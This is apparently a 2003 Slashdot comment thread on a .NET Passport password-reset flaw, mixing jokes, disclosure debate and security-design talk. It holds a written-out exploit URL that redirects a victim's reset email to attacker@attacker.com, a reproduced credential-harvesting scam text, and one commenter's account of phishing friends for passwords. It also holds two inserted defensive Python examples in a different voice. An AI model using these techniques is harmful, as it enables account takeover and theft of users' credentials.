      That's how it starts.

      In fifty years time, when Microsoft are in charge of the planet, they won't be asking you to change your last name, they'll be telling you that they've already changed your entire name to a 256-character, globally unique identifier. For your convenience, of course, and at a very reasonable fee of M$50 (MicroSerfian dollaroonies), which, again for your convenience, they've already deducted from your (compulsory) Bank of Microsoft account. As a result of this unexpected deduction, your account will go M$1 overdrawn, and this will mean that they are entitled to immediate vacant possession of your home. When you query this, it will be pointed out that this entitlement was clearly detailed in 2-point font, on page 437 (that's about one-third of the way in) of the click-through agreement that you read, understood, and click-through-agreed to when opening your (compulsory) Bank of Microsoft account. At the time that this is pointed out, your attention will be drawn to the clause on page 442 that they are also entitled to one of every major organ that you have two of. This includes (but is not limited to) your lungs, kidneys and, at the discretion of the Microsoft legal department (formerly known as the US Department of Justice), your testicles. They will gladly help you to pay for the operation to remove these organs, by the extension of a small loan, repayable in 7200 monthly payments that, for your convenience, will exactly match your monthly salary. You will be responsible for the shipping of at least two of your children to the secure holding facility at Redmond, where they will be held as collateral for the duration of the loan.

      Where do you want to go today?

    5. Re:Add one to the pile by mobileskimo · · Score: 1

      Well one of my favorite authors is Michael Moorecock (Elric, Corum, Eternal Champs). It's rather embarrassing asking an employee of Forbidden Planet,

      "Excuse me, where would I find Moorecock?"

      "I'm sorry, I wasn't aware you had some earlier..."

      --
      "Last one in is a rotten goblin!" - Kepp
    6. Re:Add one to the pile by pcardoso · · Score: 3, Funny

      funny... I just had the same problem while registering a Hotmail account for my girlfriend to use, so we could IM each other... most of our contacts are MSN addresses, so Windows Messenger was the best choice. I don't like it that much, but what the hell! Gaim has no problems with that..

      Back to the topic, her name is Ana Luisa and guess what happens when you concatenate her first two names together! It was getting on my nerves to receive an error message because of some issue with the username (but not an existing username, oddly)... It was only after a lot of attempts that I noticed the first 4 chars of the username... Added an underscore and it was all ok...

    7. Re:Add one to the pile by daveatwork · · Score: 1

      no, it's Allcock as in "Allcock no brains" :-)

    8. Re:Add one to the pile by FuzzyBad-Mofo · · Score: 1

      A 600 year loan? Damn, let's hope that lifespans increase dramatically in the future.

  41. RTFA by Anonymous Coward · · Score: 2, Informative

    secure@microsoft.com

  42. Re:FUD by Bendy+Chief · · Score: 1, Funny
    This, friend, is why I write my passwords on all my personal effects!

    It's handy-dandy, and I've never had a probASDFK6GJL45SDJ6G-CARRIER LOST-

  43. I agree completely. by @madeus · · Score: 5, Insightful

    I agree completely.

    I spent a year on contract developing a product, web based (on Unix), which allowed users and managers to spend budgets as allocated by management in real time, and I spent 3 doing just planning and developing the auth system (as it has company/office/team/user levels (user@team.office.company for the username) it was admittedly a little more complex than your average auth system).

    In the end the system has a really solid auth system: everything is authenticated, and when you try to actually make a transaction there is a multi-tiered system that checks budget approval at user, office, team and company level.

    It required mind-numbing discussions again and again to get it done but it was resolved in the end. I'm glad the project's over though; repeatedly explaining why it was necessary to take a long and stable and secure approach (rather than a quick hack approach) to non-technical people is very draining (their simple approach, though they wouldn't admit it if you asked them, was actually 'hack it together as quickly as possible', which is what a lot of competitors had done, which is why they had such poor systems, which is why this company was started).

    I utterly, utterly despair when I see CGI scripts that don't have a decent authentication mechanism. With rare exception (along the lines of everybody makes mistakes) it's just incompetence; there are simply people out there who really should not design or implement systems or write software (even CGIs).

    I am a big fan of the slow, methodical, planned, discussed and documented approach to development.

    The previous exploits for Hotmail were poor, but I recall that at least one of them was due to an error that I can empathise with to some extent (it wasn't as blatant), but I am stunned at the level of ineptitude shown by this particular exploit, but I know the same stupid mistakes are repeated all over the place...

    1. Re:I agree completely. by aphor · · Score: 1

      I'm not sure I agree with you wholeheartedly.

      there are simply people out there who really should not design or implement systems or write software (even CGIs)
      These people do not care about security. If they did, they would learn how. It is easy (even though it exposes the need for more work) to write secure software if you assume a hostile operating environment. You get in the habit of thinking "how can this technique break down?" Consequently, you get in the habit of dealing with the most common/obvious things with other proven techniques. Even the people who prefer to write sloppy hacks can be made to practice security if there is a culture of "how can we keep this from breaking?"
      --
      --- Nothing clever here: move along now...
    2. Re:I agree completely. by Anonymous Coward · · Score: 1, Insightful

      Who's to say your system is any more secure?

      There could be a dumb bug just waiting to be exploited but because (I assume) your system is not public then there probably have been no (or very simple) attacks on it.

      Anyone can make a mistake. It's not just about the design. The implementation could have any number of bugs that would compromise security. Although I don't know what your testing practices are like, I can say most programmers do an inadequate amount of testing. You need to try to break into your own system using techniques never imagined.

      Even if you did all that though, there's no telling what kind of bugs lie in wait.

    3. Re:I agree completely. by @madeus · · Score: 1

      These people do not care about security. If they did, they would learn how. It is easy (even though it exposes the need for more work) to write secure software if you assume a hostile operating environment.

      I agree that it creates more work, and that these people do not care about security, but I don't believe it's possible to change their approach if it's so broken they don't think about potential abuse from day one.

      Even the people who prefer to write sloppy hacks can be made to practice security if there is a culture of "how can we keep this from breaking?"

      Do you really think so?

      I can't say I agree as I've personally never seen 'how can we keep this from breaking' in any development culture (other than the project I looked after ;), and I don't believe that unless you're actually doing part of someone's job for them you can be sure they are taking an appropriate approach. Though I'd be interested to hear if people have experienced that kind of environment. I assume it must happen somewhere, in the finance / banking world perhaps?

      The only well developed systems I've come across have been directly down to the skills of the developer (or lead developer) responsible, rather than a result of a culture in the environment.

      This has left me with the impression that the only way to do things well is to simply have the right staff, and that exercises in establishing or changing corporate culture are largely (though not completely) a waste of resources.

    4. Re:I agree completely. by Anonymous Coward · · Score: 1, Interesting

      I (myself, little me) actually worked for a company which tested Passport (& localized it). I was one of the guys spending hours and hours doing reg. tests. And they tried to shove the Java debug position on me (that's why I quit). And yes, it's all Unix back end (was then at least). I saw things that would blow your mind!! I signed an NDA so I can't (even as AC) tell you.. :(

      One has to understand that M$ is a big company, and everyone in that company just does what they have to do to cover *their* ass! Nobody gives a F**k about the products!! The company I worked for was paid (poorly) to deliver. If that meant cutting corners...guess what...
      There is NO WAY there can be good/secure products coming out of that system!! That's why OSS will succeed.

    5. Re:I agree completely. by @madeus · · Score: 1

      Who's to say your system is any more secure?

      The design. You could simply not do that in my implementation. Yes it might have security bugs, but NOTHING as fundamentally and basically broken as that. It IS down to the design, and I think it's very important to understand if you want to write good (stable and secure) code.

      I am aghast that you might think that allowing you to change a user's password via passing bogus form parameters is not an amazingly bad thing (for the world's biggest single sign-on service at that). It should be immediately obvious that it is simply moronic.

      In my application, for example, you can't change the password without providing existing authentication details to the lower level API ('AuthUser' which calls 'User', which calls 'GetUserInfo', which calls 'DB Interface', which calls 'IO' which calls the raw database interface and gets the data out).

      [Note: Names of libraries are examples, not AFAIR actual name used.]

      The importance in the design is in using abstraction. I don't use so many libraries for fun; it is because it makes code ultimately manageable, gives you numerous checkpoints, and gives you fantastic debugging (when implemented correctly, a challenge in itself).

      But the importance is in that the user's details are never trusted; the details passed are always verified against what's actually in the database for that user - even if the function can only be called from another embedded function - this makes it very secure in that it's not possible to fake being another user without first authenticating as them, as an inspection of the user's details is done in EVERY library function.

      There are APIs for the CGI scripts to interface with, and there are APIs for those backend libraries to interface with; right at the bottom there is a single API which deals with the IO. This gives easy database portability as well as providing a layer of security, as you never interface with the database via a script, only via an API (which is the source of many problems as far as commercial web security goes; if they only accessed data via tight abstracted interfaces they simply would not be anything like as exploitable).

      By taking such an approach to the design it means an attacker could perform an exploit to upload/create a Perl script on the server to change a user's password and they still wouldn't be able to unless they had authenticated first (though of course if they could do that then you would have other issues!).

      While it's true that if I was still working on it I could think of a layer or two I'd like to add, I'm confident that, though it may have errors in the CGI which could be open to abuse, it's not open to such blatant and clearly obvious abuse.

      PS: Actually yes it is public, but you require a paid subscription (or to get a demo account for your organisation) to access it.
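The layered design this comment describes, as an added example (not the poster's code, and not the library names the poster says were illustrative anyway): a password change has to carry the caller's current credentials down through every layer, each layer re-verifies them against the store, and the storage-side interface deliberately has no entry point that sets a password without them. That is what makes the "uploaded script that skips the CGI" case fail. The layer names (CGIHandler, UserAPI, DBInterface, IOLayer), the account data and the response strings are assumptions.

```python
"""Layered password change where every layer re-verifies the caller's credentials
against the store.  Added example illustrating the design in the comment above;
all layer names, data and response strings are assumptions."""
import hashlib
import secrets


def digest(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


class IOLayer:
    """Lowest layer: raw row storage, constructed in memory for the example."""
    def __init__(self, accounts):
        self.rows = {}
        for user, pw in accounts.items():
            salt = secrets.token_bytes(16)
            self.rows[user] = (salt, digest(pw, salt))

    def read(self, user):
        return self.rows.get(user)

    def write(self, user, salt, pw_digest):
        self.rows[user] = (salt, pw_digest)


class DBInterface:
    """Data-access layer.  There is deliberately no 'set password' call that takes
    only a user name: every write requires the current credentials and checks them."""
    def __init__(self, io):
        self.io = io

    def verify(self, user, password):
        row = self.io.read(user)
        return row is not None and secrets.compare_digest(digest(password, row[0]), row[1])

    def update_password(self, user, current, new):
        if not self.verify(user, current):          # checked again at the bottom layer
            return False
        salt = secrets.token_bytes(16)
        self.io.write(user, salt, digest(new, salt))
        return True


class UserAPI:
    """Middle layer used by backend code; re-checks credentials before delegating."""
    def __init__(self, db):
        self.db = db

    def change_password(self, user, current, new):
        if not self.db.verify(user, current):
            return False
        return self.db.update_password(user, current, new)


class CGIHandler:
    """Top layer: what a web script sees.  It works only from the submitted form."""
    def __init__(self, api):
        self.api = api

    def change_password(self, form):
        needed = ("user", "current_password", "new_password")
        if any(not form.get(k) for k in needed):
            return "400 missing field"
        ok = self.api.change_password(form["user"], form["current_password"], form["new_password"])
        return "200 password changed" if ok else "403 authentication failed"


def demo():
    """Exercises the three entry points; returns the outcome of each attempt."""
    user = "alice@team.office.company"               # constructed, in the poster's naming scheme
    io = IOLayer({user: "old secret"})
    db = DBInterface(io)
    handler = CGIHandler(UserAPI(db))
    out = {}
    # Form with a bogus current password: rejected at the top layer.
    out["wrong_current"] = handler.change_password(
        {"user": user, "current_password": "guess", "new_password": "x"})
    # A caller that bypasses the CGI and API layers (the uploaded-script case)
    # reaches only an interface that still demands valid current credentials.
    out["direct_db_without_credentials"] = db.update_password(user, "", "x")
    # Legitimate change with the correct current password.
    out["correct_current"] = handler.change_password(
        {"user": user, "current_password": "old secret", "new_password": "new secret"})
    out["new_password_works"] = db.verify(user, "new secret")
    return out
```

The check is repeated in `UserAPI` and again in `DBInterface` on purpose: the duplication is the point, since a defect or bypass in one layer then leaves the next layer's check standing.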

    6. Re:I agree completely. by @madeus · · Score: 1

      Yep it's mostly FreeBSD backend, but the front end is IIS (and a smallish percentage of the backend servers are Windows based too).

      I think most large companies are in the same boat, but I think as Microsoft have such a large number of staff, such intimate knowledge of the software they are deploying and such a huge budget that they could manage projects better to prevent instances like this.

      While I think that companies that start out well and grow big all eventually outgrow their roots and typically end up the same way (and I think that this happens in all fields), I would equally have thought Microsoft would have had a few good project managers to oversee the process to ensure that best practices were being followed, especially with something as critical as Passport.

      Thats why OSS will succeed.

      I definitely agree with that.

    7. Re:I agree completely. by Old+Wolf · · Score: 1

      None of us would make a system where you can specify any email address to receive the 'change password' email.

  44. Funny stuff by Anonymous Coward · · Score: 2, Funny

    From the passport.net page, in a big green box, under the title "SECURITY", it reads:

    Sign in on any computer that has Internet access. .NET Passport uses powerful online security technology and follows a comprehensive privacy policy to help protect your profile information. You manage your information-sharing options.

  45. Re:FUD by aug24 · · Score: 2, Redundant
    Let's start with the observation that it isn't fixed. All they've done is turn off the password change routines at the back end...!

    Personally I suggest everyone reading this makes sure to tell everyone they know, in order to stop people blindly trusting any incompetents. The fact that it's MS just makes the schadenfreude better.

    Justin.

    --
    You're only jealous cos the little penguins are talking to me.
  46. Re:FUD by CrazyJ020 · · Score: 2, Interesting

    This security vulnerability, and the accompanying quick fix, seem to actually enforce Microsoft's touted concept of centralized computing and services.

    Think about it, with a company like Microsoft, there is no doubt vulnerabilities will exist. If this was a distributed product we would still have script kiddies years from now drilling on this exploit. Now that it is a centralized service, it has been fixed in one place before any substantial damage has been done. -- Which evil do you want today?

  47. why? by qbproger · · Score: 1

    Why does Microsoft always wait to fix security vulnerabilities like this? It seems like if it's not affecting one million people they don't care.

    Maybe it's because they don't want to fix vulnerabilities that aren't being taken advantage of? Seems as though there are a lot of them.

    --

    - Joe
  48. MS-Passport and those that cannot/willnot read by SgtChaireBourne · · Score: 5, Informative
    MS-Passport has long been known to be impossible to secure, even in theory: See Risks of the Passport Single Signon Protocol. Even the FTC charged Microsoft with deceptive advertising in regards to MS-Passport. Other governments are not getting caught with their mouth open either. Standards body forced Redmond to pull 'unsubstantiated and misleading' advertisement

    There really does seem to be no difference between someone who cannot read and someone who does not. Those that can read wouldn't be caught using MS-Passport. Sadly, signal can be drowned out by noise coming from a colossal marketing blitz to last through September.

    We'll see if they last that long. Windows2003 seems to be more of a push to get users over to OS X or Linux. Their other (2nd of 2) cash cow, the new MS-Office has already been postponed and seems to be more of an incentive to move to OpenOffice than to upgrade.

    --
    Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
  49. Re:Microsoft? Insecure? by ftvcs · · Score: 1

    Gates: The truth is people just think it's cool to have bugs, they are not bugs. It's a social thing. really.

  50. This is not new by johnatjohnytech · · Score: 5, Informative

    This is not a new thing, this has been around for a while.

    It is about time somebody tried to bring this to light. But I really doubt he "discovered" something that has been known about for a while.

    Don't believe me? Do a search on Kazaa for hotmail passwords. You will find several txt/docs with these or similar instructions.

    1. Re:This is not new by ymgve · · Score: 1

      I think all of those documents on Kazaa are along the same lines - tricking you into sending YOUR login and password to some shady looking address.

  51. Could be worse... by Ratface · · Score: 1, Funny

    They could fix it by making it impossible to enter arbitrary URLs in the next version of Internet Explorer :-D

    --

    A little planning goes a long way...
    1. Re:Could be worse... by ConceptJunkie · · Score: 1

      That's not funny, that's the scariest thing I've ever heard. How will you navigate a lot of sites without hacking URLs?

      Oh, well, I use Phoenix anyway.

      --
      You are in a maze of twisty little passages, all alike.
  52. People really TRUST Passport?? by mahdi13 · · Score: 1

    Reasons like this are why I only use it for Hotmail and NEVER use ANY online service to store important information, like credit cards, SS# and anything else that can easily be used for identity theft.

    --
    "Some things have to be believed to be seen." - Ralph Hodgson
  53. What breed of idiot are you? by gazbo · · Score: 5, Informative
    So it isn't a standard IIS 404. That is wrong how? Let me put it another way:
    lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1'

    HTTP/1.1 404 Not Found
    Server: Microsoft-IIS/5.0
    Date: Thu, 08 May 2003 13:10:14 GMT
    PPServer: H: LAWPPREGU4A002
    It's a 404. It returns a 404 code. It says it's a 404 on the page. Just because you understand so little of the HTTP protocol that you think 404 means "displays Apache logo" doesn't make MS wrong.
    1. Re:What breed of idiot are you? by Dark+Lord+Seth · · Score: 2, Funny
      lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1'

      HTTP/1.1 404 Not Found
      Server: Apache/2.0.43 (Unix)
      Date: Thu, 08 May 2003 13:10:14 GMT
      PPServer: H: LAWPPREGU4A002

      This would be allot more fun to see though...

    2. Re:What breed of idiot are you? by Larsing · · Score: 1

      You are obviously American.

      --
      Ethics is what you say you do. Morals is what you actually do.
    3. Re:What breed of idiot are you? by Old+Wolf · · Score: 1

      Er, after all their boasting, they use Apache+Unix for hotmail still?

    4. Re:What breed of idiot are you? by Larsing · · Score: 1

      Apparently not English either. "allot" is perfectly correct to write in British English...

      --
      Ethics is what you say you do. Morals is what you actually do.
  54. Re: Procedure to inform them it's broken. by Zak3056 · · Score: 4, Interesting

    But seriously, there seems to be no OFFICIAL way for end users to actually contact microsoft, nor any sorta automated system to rank e-mails based on importance, nor any human within the phone network who actually knows who to talk to.

    Tell me about it. When IE5 first came out (with the modular installer) the installer had a nasty bug: If the FTP site it tried to connect to to download a CAB was full, it would create the CAB file which would contain no data, only the error message!

    As one might expect, this would cause the installation to bomb, and no explanation would be given to the user. Attempting to resume the installation would also fail. The solution was, of course, to go into the installer's temp directory and delete the bad CAB files and re-download them, but most users wouldn't know where to find them, and would be forced to start from scratch.

    When I attempted to contact Microsoft about the problem, they asked me for a credit card number. When I explained I didn't want support and was trying to report a bug, I was transferred to someone else who... asked me for a credit card number. Wash, rinse, repeat.

    --
    What part of "shall not be infringed" is so hard to understand?
  55. With a name like that... by RMH101 · · Score: 1

    ...he's lucky he didn't get carted off to Guantanamo Bay...

    1. Re:With a name like that... by davesag · · Score: 1

      there is still plenty of time for that.

      --
      I used to have a better sig than this, but I got tired of it
  56. No, just popular by doublem · · Score: 1

    Nope, just means he/she is well paid for whatever portion of the sex industry they work in.

    That and EVERYONE can find something they like when going to bed with them.

    --
    "Live Free or Die." Don't like it? Then keep out of the USA
  57. How does this affect other freebie mails? by zogger · · Score: 1

    Does this exploit or similar affect yahoo mail and other similar web based free email services? Anyone check yet? Looks like there isn't a coding fix for hotmail yet, only that they turned it off, just wondering if this is going to bork all the other free web based email systems out there.

    1. Re:How does this affect other freebie mails? by clgoh · · Score: 1

      I had my Yahoo account stolen a few months ago.

      I don't know how, but it might be a similar problem.

      Yahoo customer service was not helpful...

      clgoh

    2. Re:How does this affect other freebie mails? by zogger · · Score: 1

      bummer man, sorry to hear it. This whole email "problem" and crooks and bad guys on the net is just so dismal. A lot of guys here have been on the net way longer than me, but I've been on long enough to remember when spam was pretty rare, and not a lot of "hack" attempts, at least on a Joe User desktop situation; never been in the "server" business so I really don't know how "bad" it's always been.

      Maybe bring back Old Testament styled REVENGE justice?? hahahahahaha Get caught massive spamming or black hatting, too bad, your victims get to bash you with your own equipment then. Skip fines and jail time, a nice sound mega thrashing!

      Anyway, I was suspicious of this exploit when I read how they did it. Sounds almost doable in some other situations, but I'm not an IT security expert so am not sure on it.

  58. Re:FUD by gazbo · · Score: 2, Interesting
    If you read the news article, it says that although he sent several emails, not one was sent to security@microsoft.com - the advertised place to send them.

    He sent them to, amongst others, abuse@hotmail.com. This is the place that they will get mails from everyone complaining about a spammer etc - it's like receiving the wrong order from Amazon and sending an email to hostmaster@amazon.com, then flaming them for taking so long to respond.

  59. Re:FUD by xanadu-xtroot.com · · Score: 1

    You, my friend, are a nut case. You said:

    this has already been fixed.

    Then you went on to post:

    "We have shut down all ability to reset passwords,"

    And you're calling that a "FIX"?!? Dude, that's a "work around" or a "hack" or something along those lines. That is most definitely NOT a "fix". If they turn the service back on, guess what'll happen...

    --
    I'm not a prophet or a stone-age man,
    I'm just a mortal with potential of a super man.
  60. MS announcement by fudgefactor7 · · Score: 2, Informative

    Passport Security Issue. MS was listening, Muhammad Faisal Rauf was just too impatient. Probably just wanted credit as being "kewl," or something.

    1. Re:MS announcement by tazan · · Score: 2

      Wrong. They only responded to him posting the exploit, not to the original emails.

    2. Re:MS announcement by fudgefactor7 · · Score: 1

      Wrong. He didn't send emails to the correct address. There is only ONE correct email address to contact MS about security issues, and he failed to do so. Clearly his fault, impatience, and unwillingness to "do the right [as in "correct"] thing."

    3. Re:MS announcement by MrPink2U · · Score: 1

      ...and I'm sure Microsoft would ignore an email that requested 10,000 copies of Windows XP because the request went to the wrong email address.

      rrriiiiight...

      I can't believe that anyone would actually defend MS for this blatant disregard for security.

    4. Re:MS announcement by fudgefactor7 · · Score: 1

      I can't believe that people would assume that a large, multi-national company, like MS, is capable, with the bureaucracy that is inevitably in place (as is with all such organizations) will always be able to act in a perfectly timed manner so as to get one email destined for one department but mis-routed over to the correct destination. Additionally, the "bug hunter" that found this bug (a) sent the bug (numerous times, apparently) to the WRONG ADDRESS (just like if you mail your mortgage to the wrong address--funny things will happen, like it getting lost or discarded); and (b) allowed for less than 1 day for the communication to be routed. Common sense says that's insane, and common bug reporting protocol gives 3 days. Ergo, the bug hunter is a dork who fucked up. MS, as you know, did respond and acted in a manner correct to the severity of the situation. The situation is clear to anyone who knows these things.

    5. Re:MS announcement by merchant_x · · Score: 2, Insightful

      So what's the correct address to report bugs to Microsoft? As you can see from this thread of posts several slashdotters are in the dark about this.
      http://slashdot.org/comments.pl?sid=63519&cid=5909258
      Please enlighten us.

    6. Re:MS announcement by NickFitz · · Score: 1

      This is Microsoft's response to his report.

      I notice that they don't have the line about "This was not reported to us which is terribly irresponsible etc. etc." which they often put on these things. Nor do they acknowledge that they fail to provide any obvious way to report these problems.

      Go to their security site and there is no obvious point of contact for making vuln reports.

      --
      Using HTML in email is like putting sound effects on your phone calls. Just say <strong>no</strong>.
    7. Re:MS announcement by fudgefactor7 · · Score: 1

      If it's a security issue, as this bug clearly was, you send a message to secure@microsoft.com, as indicated in the story.

    8. Re:MS announcement by tazan · · Score: 1

      Of course, and a hotmail user discovering a security hole would find that where exactly on the hotmail site? After several minutes of looking around on Microsoft's security homepage I didn't see it there either. I'm sure it's hidden in there somewhere.

  61. Re:FUD by mulhall · · Score: 2, Funny

    You seem to be under the impression that legitimate users actually change their passwords - what planet are you living on?!

  62. Erratum by gazbo · · Score: 1
    secure@microsoft.com


    No it's not already been posted before - you told me I had to wait 20 seconds, but it wasn't posted. Stupid damned slashcode coders.

  63. Re: Procedure to inform them it's broken. by zakezuke · · Score: 1

    Tell me about it. When IE5 first came out (with the modular installer) the installer had a nasty bug: If the FTP site it tried to connect to to download a CAB was full, it would create the CAB file which would contain no data, only the error message!

    Tell me about it. Let alone to speak of the issue of getting service pack 4 under Windows NT 4.0. If you are unfamiliar, you need I.E. 4.0 or above to navigate to get service pack 4 which you need to install service pack 4.0. Near as I'm aware, this is still an issue. My resolution was to download Netscape to navigate the site to get the appropriate service pack, and I just declared victory not so much because it was absolutely necessary, but because it makes a nice story needing Netscape to get any service patches from Microsoft.

    In theory, this should be the function of support, and support making the valued judgement whether or not something is a *bug*, and reporting exploits others report. But you would pretty much need a friend in the support realm who actually knew who to report to, 'cause the employees are just as helpless when dealing with their own help desk.

    "Exchange server crashed, we only support Outlook, try rebooting your system" -- typical response to everything

    --
    There is no sanctuary. There is no sanctuary. SHUT UP! There is no shut up. There is no shut up.
  64. Re:FUD by Exedore · · Score: 4, Funny

    Mechanic: We fixed your brakes... they no longer make that awful screeching sound.
    Me: Thanks. How did you fix them?
    Mechanic: We removed the brakes entirely
    Me: What the...
    Mechanic: That will be $567.98, please.

    --

    I take drugs seriously.

  65. Re:Oh my God (MS explains it all..) by jkrise · · Score: 4, Funny

    It seems that all Passport Update Services have been disabled, owing to millions of user complaints about spam! All mail accounts will need to be checked manually for spam. (all software MS Junk mail filters etc. have been junked already).

    Of course, this means that Full Control of user accounts is needed. The process of manually checking every single mail account for spam is underway. When all the billion accounts are checked and spam deleted, Passport .Net will be re-activated.

    This is the beginning of the Passport Update Synchronized Service Year (PUSSY) efforts. Thanks for your attention.

    --
    If you keep throwing chairs, one day you'll break windows....
  66. Another Hotmail Password Hack found on Kazaa by doublem · · Score: 5, Funny

    Hotmail password hacker.doc

    THIS IS HOW TO HACK ANYONE'S HOTMAIL PASSWORD

    Step 1:
    send a mail to Robot_pass_finder@hotmail.com with PW: fetchpass in the subject line

    Step 2: The email body
    In the first line: put the complete email address of the user whose password you want.

    In the 5th line, type the email address and the login (pass) you want the password sent to,
    here is an example:

    To: Robot_pass_finder@hotmail.com
    Subject: PW: fetchpass
    CC.________________ BCC.___________________
    =-email body-=

    address@hotmail.com

    your email address here example.: myemail@hotmail.com
    your pass here example.: mypassword

    --
    "Live Free or Die." Don't like it? Then keep out of the USA
    1. Re:Another Hotmail Password Hack found on Kazaa by psylent · · Score: 1

      Riiiiight, and RMS is BillG's twin bro :-) Very interesting!!! Wonder how many are going to fall for this one.

    2. Re:Another Hotmail Password Hack found on Kazaa by doublem · · Score: 1

      Nah, just a BS document I found on Kazaa.

      And no, I didn't try it. :)

      --
      "Live Free or Die." Don't like it? Then keep out of the USA
    3. Re:Another Hotmail Password Hack found on Kazaa by FroMan · · Score: 1

      So, how many usernames and passwords have you collected in Robot_pass_finder@hotmail.com?

      --
      Norris/Palin 2012
      Fact: We deserve leaders who can kick your ass and field dress your carcass.
    4. Re:Another Hotmail Password Hack found on Kazaa by HiThere · · Score: 1

      You could set up a hotmail account to try it from...

      --

      I think we've pushed this "anyone can grow up to be president" thing too far.
    5. Re:Another Hotmail Password Hack found on Kazaa by doublem · · Score: 1


      About 129 since posting the article
      </joke>

      It's not my e-mail address, and oddly, a google search turns up nothing...

      Confess!

      --
      "Live Free or Die." Don't like it? Then keep out of the USA
    6. Re:Another Hotmail Password Hack found on Kazaa by knodi · · Score: 1

      My roommate in college and I wanted to hack somebody's hotmail account once, so we searched the internet for methods to do so. I stumbled across this, and promptly fired my own login and password off.

      Five seconds later, my roommate and I looked at each other and cracked up, realizing how stupid that was. Then we registered the account "RetrievalBot" and sent out emails to all of our friends with a tailored scam message. Long story short, we got the password we wanted, plus about fifteen more. :-)

      --
      Austin is more fun than Dallas.
    7. Re:Another Hotmail Password Hack found on Kazaa by doublem · · Score: 1

      Did you get into your Hotmail account to change the username and password, thus keeping your account?

      Or did the hacker have his wicked way with your e-mail?

      Social engineering, still the best way to hack.

      --
      "Live Free or Die." Don't like it? Then keep out of the USA
  67. The problem with global accounts like Passport by Jugalator · · Score: 2, Funny

    One Company to rule them all
    One Hacker to find them
    One Exploit to bring them all
    to the attacker's power

    --
    Beware: In C++, your friends can see your privates!
  68. My company used incrementing session keys. by Moderation+abuser · · Score: 2, Interesting

    On a web page which managed HR information, so you could log in, check the session key in the URL and then simply scan through nearby numbers to find and update all sorts of things about other logged in people.

    'Twas a highly expensive piece of software as well...

    --
    Government of the people, by corporate executives, for corporate profits.
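The incrementing-key weakness this post describes, as an added example that is not code from the thread or from the HR product mentioned: a toy session store keyed first by a counter and then by `secrets.token_urlsafe`, plus the two checks (`looks_sequential`, `neighbour_exposure`) a security review would run against it. The class and function names, the sample users and the starting counter value are all constructed for the illustration.

```python
import itertools
import secrets
from typing import Callable, Dict, List, Optional


class SessionStore:
    """Minimal server-side session table mapping session key -> user.
    The key is the only credential the server checks on later requests,
    so the whole scheme's security rests on the key being unguessable."""

    def __init__(self, keygen: Callable[[], str]) -> None:
        self._keygen = keygen
        self._sessions: Dict[str, str] = {}

    def create(self, user: str) -> str:
        key = self._keygen()
        self._sessions[key] = user
        return key

    def lookup(self, key: str) -> Optional[str]:
        return self._sessions.get(key)


def counter_keygen(start: int = 1) -> Callable[[], str]:
    """Incrementing keys, the pattern the post describes (constructed toy,
    not that product's code): each key is the previous one plus one."""
    counter = itertools.count(start)
    return lambda: str(next(counter))


def random_keygen() -> str:
    """256 bits from the OS CSPRNG; the recommended replacement."""
    return secrets.token_urlsafe(32)


def looks_sequential(keys: List[str], max_gap: int = 1000) -> bool:
    """Review check on a sample of issued keys: do they all parse as integers
    with small, positive gaps between consecutive issues?  True means one
    leaked key lets a client enumerate other live sessions."""
    try:
        values = [int(k) for k in keys]
    except ValueError:
        return False  # non-numeric keys: not this particular weakness
    gaps = [b - a for a, b in zip(values, values[1:])]
    return bool(gaps) and all(0 < g <= max_gap for g in gaps)


def neighbour_exposure(store: SessionStore, own_key: str, radius: int = 5) -> int:
    """How many *other* users' sessions resolve within +/- radius of a key the
    reviewer legitimately holds?  The only acceptable answer is zero."""
    try:
        centre = int(own_key)
    except ValueError:
        return 0
    hits = 0
    for candidate in range(centre - radius, centre + radius + 1):
        if candidate != centre and store.lookup(str(candidate)) is not None:
            hits += 1
    return hits


if __name__ == "__main__":
    weak = SessionStore(counter_keygen(41000))
    keys = [weak.create(u) for u in ("alice", "bob", "carol")]
    print("sequential:", looks_sequential(keys),
          "neighbours visible from bob's key:", neighbour_exposure(weak, keys[1]))
    strong = SessionStore(random_keygen)
    keys = [strong.create(u) for u in ("alice", "bob", "carol")]
    print("sequential:", looks_sequential(keys),
          "neighbours visible from bob's key:", neighbour_exposure(strong, keys[1]))
```

The counter-keyed store fails both checks from any single legitimate key; the random one passes because 256 bits of CSPRNG output cannot be stepped through. The same rule applies to any bearer value carried in a URL or cookie: if a client can derive another valid one from its own, the value is not a credential.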
  69. Re:FUD by IDIIAMOTS · · Score: 2, Informative

    As of 6:30AM 5/8/2003 password reset ability works on passport.com.

    For non-Hotmail e-mail addresses there exists an option to receive change instructions by e-mail. The URL that's generated on those pages is similar to the one in the exploit, yet entering "attacker" address other than "victim" address doesn't result in an e-mail sent. If the two addresses in the URL match that on the account the e-mail appears to be sent.

    Looks like they indeed patched, although there shouldn't be two addresses in the URL or even better, they shouldn't be passing them in URL at all.

  70. No no no no no... by McPLUR · · Score: 1

    You guys are getting it ALL wrong, "secure computing" doesn't mean secure for the user.

    It means financial security for Microsoft.

    --
    If you don't stop reading this right now you owe me $1,000. Send check or money order too...
  71. Re:FUD by glesga_kiss · · Score: 1

    Yeah!!! They should shut down the entire system until it's fixed. The legitimate users will love that!!

  72. Joe's response by KoolDude · · Score: 1


    The remote user (attacker@attacker.com) will then receive an e-mail from the .NET Passport server providing a URL where the remote user can change the password. The form does not require the remote user to enter the previous password.

    joe, d00d's friend: Oh u mean I can access anyone's account, change their password etc. ?

    d00d, l337 h4x0r: y35, u 0wn 7h3 4ccn7 !!!

    joe: Wow, I get the idea, but how do I access mail from attacker@attacker.com without a password ?

    d00d: P555557!!!!

    --
    getSexySig(); /* returns sexy signature */
  73. his name is probably by abhisarda · · Score: 4, Informative

    Robert Babcock.

    Do a search for Ashyukun on google.(www.nhmk.com/nes/ )

    also at

    (http://216.239.33.104/search?q=cache:q1XY1gcmAYAC:www.animemusicvideos.org/members/linkprobview.php%3Fdownload_id%3D1442+Robert+Babcock+ashyukun&hl=en&ie=UTF-8).

    Consider yourself lucky you don't have to deal with hotmail. Hmm.. what do guys with names like Dick Cheney do?

    1. Re:his name is probably by fataugie · · Score: 1

      My wife had the same problem with hotmail.

      --

      WTF? Over?

  74. Back up? by SuperKendall · · Score: 1

